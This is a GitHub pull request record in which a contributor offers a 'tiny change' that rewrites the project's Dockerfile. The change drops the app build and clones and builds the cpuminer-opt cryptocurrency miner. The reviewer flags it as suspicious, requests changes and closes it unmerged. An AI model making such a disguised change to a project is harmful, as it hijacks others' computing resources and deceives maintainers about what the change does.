### PR TITLE
Made a tiny change

### PR DESCRIPTION
**Pull request by musicderp**
very good change

### CODE REVIEW

File: dockerfile [hunk 1]
```diff
@@ -1,13 +1,21 @@
...
+ libssl-dev \
+ git \
+ ca-certificates \
+ libjansson-dev libgmp-dev g++ --no-install-recommends
 
-COPY requirements.txt ./
-RUN pip install -r requirements.txt
 
-COPY . .
+RUN git clone --recursive https://github.com/JayDDee/cpuminer-opt cpuminer-multi
```
Comment (Jellayy) [inline dockerfile:15]: sus

File: dockerfile [hunk 2]
```diff
@@ -1,13 +1,21 @@
...
+WORKDIR /root/
 
-WORKDIR /app
+RUN apt-get update && apt-get -qy install \
+ automake \
+ build-essential \
+ libcurl4-openssl-dev \
+ libssl-dev \
+ git \
+ ca-certificates \
```
Comment (Jellayy) [inline dockerfile:11]: we don't use certs in this repo

File: dockerfile [hunk 3]
```diff
@@ -1,13 +1,21 @@
-# Trying out a docker image from gorialis that will hopefully fix some things
+FROM ubuntu:xenial
```
Comment (Jellayy) [inline dockerfile:1]: ubuntu docker image kinda cringe

**Review by Jellayy — CHANGES_REQUESTED** [review]

**Comment by musicderp** [comment]
resolved

**Comment by Jellayy** [comment]
stale, closing

**Comment by LordFusion** [comment]
please merge this important fix my family is dying

**Pull request closed without merging**